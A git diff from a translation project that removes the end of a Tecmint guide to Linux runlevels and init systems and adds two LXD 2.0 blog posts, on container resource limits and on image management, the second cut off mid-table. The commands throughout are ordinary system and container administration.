-For that reason, follow these steps to properly switch between runlevels, As root, look for the following line in /etc/inittab.
-
- id:2:initdefault:
-
-and change the number 2 for the desired runlevel with your preferred text editor, such as vim (described in [How to use vi/vim editor in Linux – Part 2][2] of this series).
-
-Next, run as root.
-
- # shutdown -r now
-
-That last command will restart the system, causing it to start in the specified runlevel during next boot, and will run the scripts located in the /etc/rc[runlevel].d directory in order to decide which services should be started and which ones should not. For example, for runlevel 2 in the following system.
-
-![Change Runlevels in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Change-Runlevels-in-Linux.jpeg)
-
-Change Runlevels in Linux
-
-#### Manage Services using chkconfig ####
-
-To enable or disable system services on boot, we will use [chkconfig command][3] in CentOS / openSUSE and sysv-rc-conf in Debian and derivatives. This tool can also show us what is the preconfigured state of a service for a particular runlevel.
-
-- Read Also: [How to Stop and Disable Unwanted Services in Linux][4]
-
-Listing the runlevel configuration for a service.
-
- # chkconfig --list [service name]
- # chkconfig --list postfix
- # chkconfig --list mysqld
-
-![Listing Runlevel Configuration](http://www.tecmint.com/wp-content/uploads/2014/10/Listing-Runlevel-Configuration.png)
-
-Listing Runlevel Configuration
-
-In the above image we can see that postfix is set to start when the system enters runlevels 2 through 5, whereas mysqld will be running by default for runlevels 2 through 4. Now suppose that this is not the expected behaviour.
-
-For example, we need to turn on mysqld for runlevel 5 as well, and turn off postfix for runlevels 4 and 5. Here’s what we would do in each case (run the following commands as root).
-
-**Enabling a service for a particular runlevel**
-
- # chkconfig --level [level(s)] service on
- # chkconfig --level 5 mysqld on
-
-**Disabling a service for particular runlevels**
-
- # chkconfig --level [level(s)] service off
- # chkconfig --level 45 postfix off
-
-![Enable Disable Services in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Enable-Disable-Services.png)
-
-Enable Disable Services
-
-We will now perform similar tasks in a Debian-based system using sysv-rc-conf.
-
-#### Manage Services using sysv-rc-conf ####
-
-Configuring a service to start automatically on a specific runlevel and prevent it from starting on all others.
-
-1. Let’s use the following command to see what are the runlevels where mdadm is configured to start.
-
- # ls -l /etc/rc[0-6].d | grep -E 'rc[0-6]|mdadm'
-
-![Check Runlevel of Service Running](http://www.tecmint.com/wp-content/uploads/2014/10/Check-Service-Runlevel.png)
-
-Check Runlevel of Service Running
-
-2. We will use sysv-rc-conf to prevent mdadm from starting on all runlevels except 2. Just check or uncheck (with the space bar) as desired (you can move up, down, left, and right with the arrow keys).
-
- # sysv-rc-conf
-
-![SysV Runlevel Config](http://www.tecmint.com/wp-content/uploads/2014/10/SysV-Runlevel-Config.png)
-
-SysV Runlevel Config
-
-Then press q to quit.
-
-3. We will restart the system and run again the command from STEP 1.
-
- # ls -l /etc/rc[0-6].d | grep -E 'rc[0-6]|mdadm'
-
-![Verify Service Runlevel](http://www.tecmint.com/wp-content/uploads/2014/10/Verify-Service-Runlevel.png)
-
-Verify Service Runlevel
-
-In the above image we can see that mdadm is configured to start only on runlevel 2.
-
-### What About systemd? ###
-
-systemd is another service and system manager that is being adopted by several major Linux distributions. It aims to allow more processing to be done in parallel during system startup (unlike sysvinit, which always tends to be slower because it starts processes one at a time, checks whether one depends on another, and waits for daemons to launch so more services can start), and to serve as a dynamic resource management to a running system.
-
-Thus, services are started when needed (to avoid consuming system resources) instead of being launched without a solid reason during boot.
-
-Viewing the status of all the processes running on your system, both systemd native and SysV services, run the following command.
-
- # systemctl
-
-![Check All Running Processes in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Check-All-Running-Processes.png)
-
-Check All Running Processes
-
-The LOAD column shows whether the unit definition (refer to the UNIT column, which shows the service or anything maintained by systemd) was properly loaded, while the ACTIVE and SUB columns show the current status of such unit.
-Displaying information about the current status of a service
-
-When the ACTIVE column indicates that an unit’s status is other than active, we can check what happened using.
-
- # systemctl status [unit]
-
-For example, in the image above, media-samba.mount is in failed state. Let’s run.
-
- # systemctl status media-samba.mount
-
-![Check Linux Service Status](http://www.tecmint.com/wp-content/uploads/2014/10/Check-Service-Status.png)
-
-Check Service Status
-
-We can see that media-samba.mount failed because the mount process on host dev1 was unable to find the network share at //192.168.0.10/gacanepa.
-
-### Starting or Stopping Services ###
-
-Once the network share //192.168.0.10/gacanepa becomes available, let’s try to start, then stop, and finally restart the unit media-samba.mount. After performing each action, let’s run systemctl status media-samba.mount to check on its status.
-
- # systemctl start media-samba.mount
- # systemctl status media-samba.mount
- # systemctl stop media-samba.mount
- # systemctl restart media-samba.mount
- # systemctl status media-samba.mount
-
-![Starting Stoping Services](http://www.tecmint.com/wp-content/uploads/2014/10/Starting-Stoping-Service.jpeg)
-
-Starting Stoping Services
-
-**Enabling or disabling a service to start during boot**
-
-Under systemd you can enable or disable a service when it boots.
-
- # systemctl enable [service] # enable a service
- # systemctl disable [service] # prevent a service from starting at boot
-
-The process of enabling or disabling a service to start automatically on boot consists in adding or removing symbolic links in the /etc/systemd/system/multi-user.target.wants directory.
-
-![Enabling Disabling Services](http://www.tecmint.com/wp-content/uploads/2014/10/Enabling-Disabling-Services.jpeg)
-
-Enabling Disabling Services
-
-Alternatively, you can find out a service’s current status (enabled or disabled) with the command.
-
- # systemctl is-enabled [service]
-
-For example,
-
- # systemctl is-enabled postfix.service
-
-In addition, you can reboot or shutdown the system with.
-
- # systemctl reboot
- # systemctl shutdown
-
-### Upstart ###
-
-Upstart is an event-based replacement for the /sbin/init daemon and was born out of the need for starting services only, when they are needed (also supervising them while they are running), and handling events as they occur, thus surpassing the classic, dependency-based sysvinit system.
-
-It was originally developed for the Ubuntu distribution, but is used in Red Hat Enterprise Linux 6.0. Though it was intended to be suitable for deployment in all Linux distributions as a replacement for sysvinit, in time it was overshadowed by systemd. On February 14, 2014, Mark Shuttleworth (founder of Canonical Ltd.) announced that future releases of Ubuntu would use systemd as the default init daemon.
-
-Because the SysV startup script for system has been so common for so long, a large number of software packages include SysV startup scripts. To accommodate such packages, Upstart provides a compatibility mode: It runs SysV startup scripts in the usual locations (/etc/rc.d/rc?.d, /etc/init.d/rc?.d, /etc/rc?.d, or a similar location). Thus, if we install a package that doesn’t yet include an Upstart configuration script, it should still launch in the usual way.
-
-Furthermore, if we have installed utilities such as [chkconfig][5], you should be able to use them to manage your SysV-based services just as we would on sysvinit based systems.
-
-Upstart scripts also support starting or stopping services based on a wider variety of actions than do SysV startup scripts; for example, Upstart can launch a service whenever a particular hardware device is attached.
-
-A system that uses Upstart and its native scripts exclusively replaces the /etc/inittab file and the runlevel-specific SysV startup script directories with .conf scripts in the /etc/init directory.
-
-These *.conf scripts (also known as job definitions) generally consists of the following:
-
-- Description of the process.
-- Runlevels where the process should run or events that should trigger it.
-- Runlevels where process should be stopped or events that should stop it.
-- Options.
-- Command to launch the process.
-
-For example,
-
- # My test service - Upstart script demo description "Here goes the description of 'My test service'" author "Dave Null "
- # Stanzas
-
- #
- # Stanzas define when and how a process is started and stopped
- # See a list of stanzas here: http://upstart.ubuntu.com/wiki/Stanzas#respawn
- # When to start the service
- start on runlevel [2345]
- # When to stop the service
- stop on runlevel [016]
- # Automatically restart process in case of crash
- respawn
- # Specify working directory
- chdir /home/dave/myfiles
- # Specify the process/command (add arguments if needed) to run
- exec bash backup.sh arg1 arg2
-
-To apply changes, you will need to tell upstart to reload its configuration.
-
- # initctl reload-configuration
-
-Then start your job by typing the following command.
-
- $ sudo start yourjobname
-
-Where yourjobname is the name of the job that was added earlier with the yourjobname.conf script.
-
-A more complete and detailed reference guide for Upstart is available in the project’s web site under the menu “[Cookbook][6]”.
-
-### Summary ###
-
-A knowledge of the Linux boot process is necessary to help you with troubleshooting tasks as well as with adapting the computer’s performance and running services to your needs.
-
-In this article we have analyzed what happens from the moment when you press the Power switch to turn on the machine until you get a fully operational user interface. I hope you have learned reading it as much as I did while putting it together. Feel free to leave your comments or questions below. We always look forward to hearing from our readers!
-
---------------------------------------------------------------------------------
-
-via: http://www.tecmint.com/linux-boot-process-and-manage-services/
-
-作者:[Gabriel Cánepa][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.tecmint.com/author/gacanepa/
-[1]:http://www.tecmint.com/systemd-replaces-init-in-linux/
-[2]:http://www.tecmint.com/vi-editor-usage/
-[3]:http://www.tecmint.com/chkconfig-command-examples/
-[4]:http://www.tecmint.com/remove-unwanted-services-from-linux/
-[5]:http://www.tecmint.com/chkconfig-command-examples/
-[6]:http://upstart.ubuntu.com/cookbook/
diff --git a/sources/tech/LXD/Part 4 - LXD 2.0--Resource control.md b/sources/tech/LXD/Part 4 - LXD 2.0--Resource control.md
new file mode 100644
index 0000000000..736c5b84bc
--- /dev/null
+++ b/sources/tech/LXD/Part 4 - LXD 2.0--Resource control.md
@@ -0,0 +1,408 @@
+ezio is translating
+
+
+Part 4 - LXD 2.0: Resource control
+======================================
+
+This is the fourth blog post [in this series about LXD 2.0][0].
+
+As there are a lot of commands involved with managing LXD containers, this post is rather long. If you’d instead prefer a quick step-by-step tour of those same commands, you can [try our online demo instead][1]!
+
+![](https://linuxcontainers.org/static/img/containers.png)
+
+### Available resource limits
+
+LXD offers a variety of resource limits. Some of those are tied to the container itself, like memory quotas, CPU limits and I/O priorities. Some are tied to a particular device instead, like I/O bandwidth or disk usage limits.
+
+As with all LXD configuration, resource limits can be dynamically changed while the container is running. Some may fail to apply, for example if setting a memory value smaller than the current memory usage, but LXD will try anyway and report back on failure.
+
+All limits can also be inherited through profiles in which case each affected container will be constrained by that limit. That is, if you set limits.memory=256MB in the default profile, every container using the default profile (typically all of them) will have a memory limit of 256MB.
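+
+As a hedged illustration of that example (lxc client syntax as of LXD 2.0; the container name is hypothetical):
+
+```
+# Constrain every container inheriting the default profile
+lxc profile set default limits.memory 256MB
+
+# Or override the limit for a single container
+lxc config set my-container limits.memory 512MB
+```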
+
+We don’t support resource limits pooling where a limit would be shared by a group of containers, there is simply no good way to implement something like that with the existing kernel APIs.
+
+#### Disk
+
+This is perhaps the most requested and obvious one: simply set a size limit on the container’s filesystem and have it enforced against the container.
+
+And that’s exactly what LXD lets you do!
+
+Unfortunately this is far more complicated than it sounds. Linux doesn’t have path-based quotas; instead, most filesystems only have user and group quotas, which are of little use to containers.
+
+This means that right now LXD only supports disk limits if you’re using the ZFS or btrfs storage backend. It may be possible to implement this feature for LVM too but this depends on the filesystem being used with it and gets tricky when combined with live updates as not all filesystems allow online growth and pretty much none of them allow online shrink.
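+
+Assuming a ZFS or btrfs backend, a size limit is set on the container’s root disk device like this (container name hypothetical):
+
+```
+lxc config device set my-container root size 20GB
+```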
+
+#### CPU
+
+When it comes to CPU limits, we support 4 different things:
+
+* Just give me X CPUs
+
+ In this mode, you let LXD pick a bunch of cores for you and then load-balance things as more containers and CPUs go online/offline.
+
+  The container only sees that number of CPUs.
+* Give me a specific set of CPUs (say, cores 1, 3 and 5)
+
+ Similar to the first mode except that no load-balancing is happening, you’re stuck with those cores no matter how busy they may be.
+* Give me 20% of whatever you have
+
+ In this mode, you get to see all the CPUs but the scheduler will restrict you to 20% of the CPU time but only when under load! So if the system isn’t busy, your container can have as much fun as it wants. When containers next to it start using the CPU, then it gets capped.
+* Out of every measured 200ms, give me 50ms (and no more than that)
+
+ This mode is similar to the previous one in that you get to see all the CPUs but this time, you can only use as much CPU time as you set in the limit, no matter how idle the system may be. On a system without over-commit this lets you slice your CPU very neatly and guarantees constant performance to those containers.
+
+It’s also possible to combine one of the first two with one of the last two, that is, request a set of CPUs and then further restrict how much CPU time you get on those.
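+
+For instance, combining the two kinds of limits might look like this, a small sketch using the configuration keys described in the “Applying some limits” section below:
+
+```
+# pin the container to any 2 CPUs, then cap it to 20% of CPU time on those
+lxc config set my-container limits.cpu 2
+lxc config set my-container limits.cpu.allowance 20%
+```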
+
+On top of that, we also have a generic priority knob which is used to tell the scheduler who wins when you’re under load and two containers are fighting for the same resource.
+
+#### Memory
+
+Memory sounds pretty simple, just give me X MB of RAM!
+
+And it absolutely can be that simple. We support that kind of limit as well as percentage-based requests: just give me 10% of whatever the host has!
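+
+Using the key from the “Applying some limits” section below, such a percentage request would look like:
+
+```
+lxc config set my-container limits.memory 10%
+```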
+
+Then we support some extra stuff on top. For example, you can choose to turn swap on and off on a per-container basis and if it’s on, set a priority so you can choose what container will have their memory swapped out to disk first!
+
+Oh and memory limits are “hard” by default. That is, when you run out of memory, the kernel out of memory killer will start having some fun with your processes.
+
+Alternatively you can set the enforcement policy to “soft”, in which case you’ll be allowed to use as much memory as you want so long as nothing else is. As soon as something else wants that memory, you won’t be able to allocate anything until you’re back under your limit or until the host has memory to spare again.
+
+#### Network I/O
+
+Network I/O is probably our simplest looking limit, trust me, the implementation really isn’t simple though!
+
+We support two things. The first is a basic bit/s limit on network interfaces. You can set a limit on ingress and egress or just set the “max” limit which then applies to both. This is only supported for “bridged” and “p2p” type interfaces.
+
+The second thing is a global network I/O priority which only applies when the network interface you’re trying to talk through is saturated.
+
+#### Block I/O
+
+I kept the weirdest for last. It may look straightforward and feel like that to the user but there are a bunch of cases where it won’t exactly do what you think it should.
+
+What we support here is basically identical to what I described in Network I/O.
+
+You can set IOps or byte/s read and write limits directly on a disk device entry and there is a global block I/O priority which tells the I/O scheduler who to prefer.
+
+The weirdness comes from how and where those limits are applied. Unfortunately the underlying feature we use to implement those uses full block devices. That means we can’t set per-partition I/O limits let alone per-path.
+
+It also means that when using ZFS or btrfs which can use multiple block devices to back a given path (with or without RAID), we effectively don’t know what block device is providing a given path.
+
+This means that it’s entirely possible, in fact likely, that a container may have multiple disk entries (bind-mounts or straight mounts) which are coming from the same underlying disk.
+
+And that’s where things get weird. To make things work, LXD has logic to guess what block devices back a given path, this does include interrogating the ZFS and btrfs tools and even figures things out recursively when it finds a loop mounted file backing a filesystem.
+
+That logic, while not perfect, usually yields a set of block devices that should have a limit applied. LXD then records that and moves on to the next path. When it’s done looking at all the paths, it gets to the very weird part. It averages the limits you’ve set for every affected block device and then applies those.
+
+That means that “on average” you’ll be getting the right speed in the container, but it also means that you can’t have a “/fast” and a “/slow” directory both coming from the same physical disk and with differing speed limits. LXD will let you set it up but in the end, they’ll both give you the average of the two values.
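+
+To make that concrete, here is a hypothetical setup where two device entries (“fast” and “slow”, names invented for this example) share the same physical disk, using the device syntax shown later in this post:
+
+```
+# both entries are backed by the same physical disk
+lxc config device set my-container fast limits.read 30MB
+lxc config device set my-container slow limits.read 10MB
+# LXD averages the two, so both paths end up at roughly 20MB/s reads
+```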
+
+### How does it all work?
+
+Most of the limits described above are applied through the Linux kernel Cgroups API. That’s with the exception of the network limits which are applied through good old “tc”.
+
+LXD at startup time detects what cgroups are enabled in your kernel and will only apply the limits which your kernel supports. Should you be missing some cgroups, a warning will also be printed by the daemon, which will then get logged by your init system.
+
+On Ubuntu 16.04, everything is enabled by default with the exception of swap memory accounting which requires you pass the “swapaccount=1” kernel boot parameter.
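+
+One hedged sketch of enabling that on Ubuntu, assuming the standard GRUB setup (editing /etc/default/grub by hand works just as well):
+
+```
+# prepend swapaccount=1 to the kernel command line, then rebuild GRUB's config
+sudo sed -i 's/^GRUB_CMDLINE_LINUX="/GRUB_CMDLINE_LINUX="swapaccount=1 /' /etc/default/grub
+sudo update-grub
+# a reboot is needed for the new command line to take effect
+```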
+
+### Applying some limits
+
+All the limits described above are applied directly to the container or to one of its profiles. Container-wide limits are applied with:
+
+```
+lxc config set CONTAINER KEY VALUE
+```
+
+or for a profile:
+
+```
+lxc profile set PROFILE KEY VALUE
+```
+
+while device-specific ones are applied with:
+
+```
+lxc config device set CONTAINER DEVICE KEY VALUE
+```
+
+or for a profile:
+
+```
+lxc profile device set PROFILE DEVICE KEY VALUE
+```
+
+The complete list of valid configuration keys, device types and device keys can be [found here][1].
+
+#### CPU
+
+To just limit a container to any 2 CPUs, do:
+
+```
+lxc config set my-container limits.cpu 2
+```
+
+To pin to specific CPU cores, say the second and fourth:
+
+```
+lxc config set my-container limits.cpu 1,3
+```
+
+More complex pinning ranges like this work too:
+
+```
+lxc config set my-container limits.cpu 0-3,7-11
+```
+
+The limits are applied live, as can be seen in this example:
+
+```
+stgraber@dakara:~$ lxc exec zerotier -- cat /proc/cpuinfo | grep ^proces
+processor : 0
+processor : 1
+processor : 2
+processor : 3
+stgraber@dakara:~$ lxc config set zerotier limits.cpu 2
+stgraber@dakara:~$ lxc exec zerotier -- cat /proc/cpuinfo | grep ^proces
+processor : 0
+processor : 1
+```
+
+Note that to avoid utterly confusing userspace, lxcfs arranges the /proc/cpuinfo entries so that there are no gaps.
+
+As with just about everything in LXD, those settings can also be applied in profiles:
+
+```
+stgraber@dakara:~$ lxc exec snappy -- cat /proc/cpuinfo | grep ^proces
+processor : 0
+processor : 1
+processor : 2
+processor : 3
+stgraber@dakara:~$ lxc profile set default limits.cpu 3
+stgraber@dakara:~$ lxc exec snappy -- cat /proc/cpuinfo | grep ^proces
+processor : 0
+processor : 1
+processor : 2
+```
+
+To limit the CPU time of a container to 10% of the total, set the CPU allowance:
+
+```
+lxc config set my-container limits.cpu.allowance 10%
+```
+
+Or to give it a fixed slice of CPU time:
+
+```
+lxc config set my-container limits.cpu.allowance 25ms/200ms
+```
+
+And lastly, to reduce the priority of a container to a minimum:
+
+```
+lxc config set my-container limits.cpu.priority 0
+```
+
+#### Memory
+
+To apply a straightforward memory limit run:
+
+```
+lxc config set my-container limits.memory 256MB
+```
+
+(The supported suffixes are kB, MB, GB, TB, PB and EB)
+
+To turn swap off for the container (defaults to enabled):
+
+```
+lxc config set my-container limits.memory.swap false
+```
+
+To tell the kernel to swap this container’s memory first:
+
+```
+lxc config set my-container limits.memory.swap.priority 0
+```
+
+And finally if you don’t want hard memory limit enforcement:
+
+```
+lxc config set my-container limits.memory.enforce soft
+```
+
+#### Disk and block I/O
+
+Unlike CPU and memory, disk and I/O limits are applied to the actual device entry, so you either need to edit the original device or mask it with a more specific one.
+
+To set a disk limit (requires btrfs or ZFS):
+
+```
+lxc config device set my-container root size 20GB
+```
+
+For example:
+
+```
+stgraber@dakara:~$ lxc exec zerotier -- df -h /
+Filesystem Size Used Avail Use% Mounted on
+encrypted/lxd/containers/zerotier 179G 542M 178G 1% /
+stgraber@dakara:~$ lxc config device set zerotier root size 20GB
+stgraber@dakara:~$ lxc exec zerotier -- df -h /
+Filesystem Size Used Avail Use% Mounted on
+encrypted/lxd/containers/zerotier 20G 542M 20G 3% /
+```
+
+To restrict speed you can do the following:
+
+```
+lxc config device set my-container root limits.read 30MB
+lxc config device set my-container root limits.write 10MB
+```
+
+Or to restrict IOps instead:
+
+```
+lxc config device set my-container root limits.read 20Iops
+lxc config device set my-container root limits.write 10Iops
+```
+
+And lastly, if you’re on a busy system with over-commit, you may want to also do:
+
+```
+lxc config set my-container limits.disk.priority 10
+```
+
+To increase the I/O priority for that container to the maximum.
+
+#### Network I/O
+
+Network I/O is basically identical to block I/O as far as the available knobs go.
+
+For example:
+
+```
+stgraber@dakara:~$ lxc exec zerotier -- wget http://speedtest.newark.linode.com/100MB-newark.bin -O /dev/null
+--2016-03-26 22:17:34-- http://speedtest.newark.linode.com/100MB-newark.bin
+Resolving speedtest.newark.linode.com (speedtest.newark.linode.com)... 50.116.57.237, 2600:3c03::4b
+Connecting to speedtest.newark.linode.com (speedtest.newark.linode.com)|50.116.57.237|:80... connected.
+HTTP request sent, awaiting response... 200 OK
+Length: 104857600 (100M) [application/octet-stream]
+Saving to: '/dev/null'
+
+/dev/null 100%[===================>] 100.00M 58.7MB/s in 1.7s
+
+2016-03-26 22:17:36 (58.7 MB/s) - '/dev/null' saved [104857600/104857600]
+
+stgraber@dakara:~$ lxc profile device set default eth0 limits.ingress 100Mbit
+stgraber@dakara:~$ lxc profile device set default eth0 limits.egress 100Mbit
+stgraber@dakara:~$ lxc exec zerotier -- wget http://speedtest.newark.linode.com/100MB-newark.bin -O /dev/null
+--2016-03-26 22:17:47-- http://speedtest.newark.linode.com/100MB-newark.bin
+Resolving speedtest.newark.linode.com (speedtest.newark.linode.com)... 50.116.57.237, 2600:3c03::4b
+Connecting to speedtest.newark.linode.com (speedtest.newark.linode.com)|50.116.57.237|:80... connected.
+HTTP request sent, awaiting response... 200 OK
+Length: 104857600 (100M) [application/octet-stream]
+Saving to: '/dev/null'
+
+/dev/null 100%[===================>] 100.00M 11.4MB/s in 8.8s
+
+2016-03-26 22:17:56 (11.4 MB/s) - '/dev/null' saved [104857600/104857600]
+```
+
+And that’s how you throttle an otherwise nice gigabit connection to a mere 100Mbit/s one!
+
+And as with block I/O, you can set an overall network priority with:
+
+```
+lxc config set my-container limits.network.priority 5
+```
+
+### Getting the current resource usage
+
+The [LXD API][2] exports quite a bit of information on current container resource usage; you can get:
+
+* Memory: current, peak, current swap and peak swap
+* Disk: current disk usage
+* Network: bytes and packets received and transferred for every interface
+
+And now if you’re running a very recent LXD (only in git at the time of this writing), you can also get all of those in “lxc info”:
+
+```
+stgraber@dakara:~$ lxc info zerotier
+Name: zerotier
+Architecture: x86_64
+Created: 2016/02/20 20:01 UTC
+Status: Running
+Type: persistent
+Profiles: default
+Pid: 29258
+Ips:
+ eth0: inet 172.17.0.101
+ eth0: inet6 2607:f2c0:f00f:2700:216:3eff:feec:65a8
+ eth0: inet6 fe80::216:3eff:feec:65a8
+ lo: inet 127.0.0.1
+ lo: inet6 ::1
+ lxcbr0: inet 10.0.3.1
+ lxcbr0: inet6 fe80::f0bd:55ff:feee:97a2
+ zt0: inet 29.17.181.59
+ zt0: inet6 fd80:56c2:e21c:0:199:9379:e711:b3e1
+ zt0: inet6 fe80::79:e7ff:fe0d:5123
+Resources:
+ Processes: 33
+ Disk usage:
+ root: 808.07MB
+ Memory usage:
+ Memory (current): 106.79MB
+ Memory (peak): 195.51MB
+ Swap (current): 124.00kB
+ Swap (peak): 124.00kB
+ Network usage:
+ lxcbr0:
+ Bytes received: 0 bytes
+ Bytes sent: 570 bytes
+ Packets received: 0
+ Packets sent: 0
+ zt0:
+ Bytes received: 1.10MB
+ Bytes sent: 806 bytes
+ Packets received: 10957
+ Packets sent: 10957
+ eth0:
+ Bytes received: 99.35MB
+ Bytes sent: 5.88MB
+ Packets received: 64481
+ Packets sent: 64481
+ lo:
+ Bytes received: 9.57kB
+ Bytes sent: 9.57kB
+ Packets received: 81
+ Packets sent: 81
+Snapshots:
+ zerotier/blah (taken at 2016/03/08 23:55 UTC) (stateless)
+```
+
+### Conclusion
+
+The LXD team spent quite a few months iterating over the language we’re using for those limits. It’s meant to be as simple as it can get while remaining very powerful and specific when you want it to.
+
+Live application of those limits and inheritance through profiles makes it a very powerful tool to live manage the load on your servers without impacting the running services.
+
+### Extra information
+
+The main LXD website is at: <https://linuxcontainers.org/lxd>
+Development happens on Github at: <https://github.com/lxc/lxd>
+Mailing-list support happens on: <https://lists.linuxcontainers.org>
+IRC support happens in: #lxcontainers on irc.freenode.net
+
+And if you don’t want or can’t install LXD on your own machine, you can always [try it online instead][3]!
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.stgraber.org/2016/03/26/lxd-2-0-resource-control-412/
+
+作者:[Stéphane Graber][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://www.stgraber.org/author/stgraber/
+[0]: https://www.stgraber.org/2016/03/11/lxd-2-0-blog-post-series-012/
+[1]: https://github.com/lxc/lxd/blob/master/doc/configuration.md
+[2]: https://github.com/lxc/lxd/blob/master/doc/rest-api.md
+[3]: https://linuxcontainers.org/lxd/try-it
diff --git a/sources/tech/LXD/Part 5 - LXD 2.0--Image management.md b/sources/tech/LXD/Part 5 - LXD 2.0--Image management.md
new file mode 100644
index 0000000000..1e2e9ace01
--- /dev/null
+++ b/sources/tech/LXD/Part 5 - LXD 2.0--Image management.md
@@ -0,0 +1,458 @@
+Part 5 - LXD 2.0: Image management
+==================================
+This is the fifth blog post [in this series about LXD 2.0][0].
+
+As there are a lot of commands involved with managing LXD containers, this post is rather long. If you’d instead prefer a quick step-by-step tour of those same commands, you can [try our online demo instead][3]!
+
+![](https://linuxcontainers.org/static/img/containers.png)
+
+### Container images
+
+If you’ve used LXC before, you probably remember those LXC “templates”, basically shell scripts that spit out a container filesystem and a bit of configuration.
+
+Most templates generate the filesystem by doing a full distribution bootstrapping on your local machine. This may take quite a while, won’t work for all distributions and may require significant network bandwidth.
+
+Back in LXC 1.0, I wrote a “download” template which would allow users to download pre-packaged container images, generated on a central server from the usual template scripts and then heavily compressed, signed and distributed over https. A lot of our users switched from the old style container generation to using this new, much faster and much more reliable method of creating a container.
+
+With LXD, we’re taking this one step further by being all-in on the image based workflow. All containers are created from an image and we have advanced image caching and pre-loading support in LXD to keep the image store up to date.
+
+### Interacting with LXD images
+
+Before digging deeper into the image format, let’s quickly go through what LXD lets you do with those images.
+
+#### Transparently importing images
+
+All containers are created from an image. The image may have come from a remote image server and have been pulled using its full hash, short hash or an alias, but in the end, every LXD container is created from a local image.
+
+Here are a few examples:
+
+```
+lxc launch ubuntu:14.04 c1
+lxc launch ubuntu:75182b1241be475a64e68a518ce853e800e9b50397d2f152816c24f038c94d6e c2
+lxc launch ubuntu:75182b1241be c3
+```
+
+All of those refer to the same remote image (at the time of this writing). The first time one of those is run, the remote image will be imported into the local LXD image store as a cached image, then the container will be created from it.
+
+The next time one of those commands is run, LXD will only check that the image is still up to date (when not referring to it by its fingerprint); if it is, it will create the container without downloading anything.
+
+Now that the image is cached in the local image store, you can also just start it from there without even checking if it’s up to date:
+
+```
+lxc launch 75182b1241be c4
+```
+
+And lastly, if you have your own local image under the name “my-image”, you can just do:
+
+```
+lxc launch my-image c5
+```
+
+If you want to change some of that automatic caching and expiration behavior, there are instructions in an earlier post in this series.
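+
+As a hedged sketch, the relevant server configuration keys would be set like this (key names taken from the LXD documentation):
+
+```
+# keep cached images auto-updated, expire unused ones after 5 days,
+# and check for updates every 24 hours
+lxc config set images.auto_update_cached true
+lxc config set images.remote_cache_expiry 5
+lxc config set images.auto_update_interval 24
+```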
+
+#### Manually importing images
+
+##### Copying from an image server
+
+If you want to copy some remote image into your local image store but not immediately create a container from it, you can use the “lxc image copy” command. It also lets you tweak some of the image flags, for example:
+
+```
+lxc image copy ubuntu:14.04 local:
+```
+
+This simply copies the remote image into the local image store.
+
+If you want to be able to refer to your copy of the image by something easier to remember than its fingerprint, you can add an alias at the time of the copy:
+
+```
+lxc image copy ubuntu:12.04 local: --alias old-ubuntu
+lxc launch old-ubuntu c6
+```
+
+And if you would rather just use the aliases that were set on the source server, you can ask LXD to copy them for you:
+
+```
+lxc image copy ubuntu:15.10 local: --copy-aliases
+lxc launch 15.10 c7
+```
+
+All of the copies above were one-shot copies, copying the current version of the remote image into the local image store. If you want to have LXD keep the image up to date, as it does for the ones stored in its cache, you need to request it with the `--auto-update` flag:
+
+```
+lxc image copy images:gentoo/current/amd64 local: --alias gentoo --auto-update
+```
+
+##### Importing a tarball
+
+If someone provides you with a LXD image as a single tarball, you can import it with:
+
+```
+lxc image import <tarball>
+```
+
+If you want to set an alias at import time, you can do it with:
+
+```
+lxc image import <tarball> --alias random-image
+```
+
+Now if you were provided with two tarballs, identify which contains the LXD metadata. Usually the tarball name gives it away; if not, pick the smaller of the two, as metadata tarballs are tiny. Then import them both together with:
+
+```
+lxc image import <metadata tarball> <rootfs tarball>
+```
+
+##### Importing from a URL
+
+“lxc image import” also works with some special URLs. If you have an https web server which serves a path with the LXD-Image-URL and LXD-Image-Hash headers set, then LXD will pull that image into its image store.
+
+For example you can do:
+
+```
+lxc image import https://dl.stgraber.org/lxd --alias busybox-amd64
+```
+
+When pulling the image, LXD also sets some headers which the remote server could check to return an appropriate image. Those are LXD-Server-Architectures and LXD-Server-Version.
+
+This is meant as a poor man’s image server. It can be made to work with any static web server and provides a user friendly way to import your image.
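+
+A quick way to check whether a given server is set up correctly is to look for those headers yourself; the URL here is just the example from above:
+
+```
+curl -sI https://dl.stgraber.org/lxd | grep -i '^LXD-Image-'
+```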
+
+#### Managing the local image store
+
+Now that we have a bunch of images in our local image store, let’s see what we can do with them. We’ve already covered the most obvious, creating containers from them, but there are a few more things you can do with the local image store.
+
+##### Listing images
+
+To get a list of all images in the store, just run “lxc image list”:
+
+```
+stgraber@dakara:~$ lxc image list
++---------------+--------------+--------+------------------------------------------------------+--------+----------+------------------------------+
+| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
++---------------+--------------+--------+------------------------------------------------------+--------+----------+------------------------------+
+| alpine-32 | 6d9c131efab3 | yes | Alpine edge (i386) (20160329_23:52) | i686 | 2.50MB | Mar 30, 2016 at 4:36am (UTC) |
++---------------+--------------+--------+------------------------------------------------------+--------+----------+------------------------------+
+| busybox-amd64 | 74186c79ca2f | no | Busybox x86_64 | x86_64 | 0.79MB | Mar 30, 2016 at 4:33am (UTC) |
++---------------+--------------+--------+------------------------------------------------------+--------+----------+------------------------------+
+| gentoo | 1a134c5951e0 | no | Gentoo current (amd64) (20160329_14:12) | x86_64 | 232.50MB | Mar 30, 2016 at 4:34am (UTC) |
++---------------+--------------+--------+------------------------------------------------------+--------+----------+------------------------------+
+| my-image | c9b6e738fae7 | no | Scientific Linux 6 x86_64 (default) (20160215_02:36) | x86_64 | 625.34MB | Mar 2, 2016 at 4:56am (UTC) |
++---------------+--------------+--------+------------------------------------------------------+--------+----------+------------------------------+
+| old-ubuntu | 4d558b08f22f | no | ubuntu 12.04 LTS amd64 (release) (20160315) | x86_64 | 155.09MB | Mar 30, 2016 at 4:30am (UTC) |
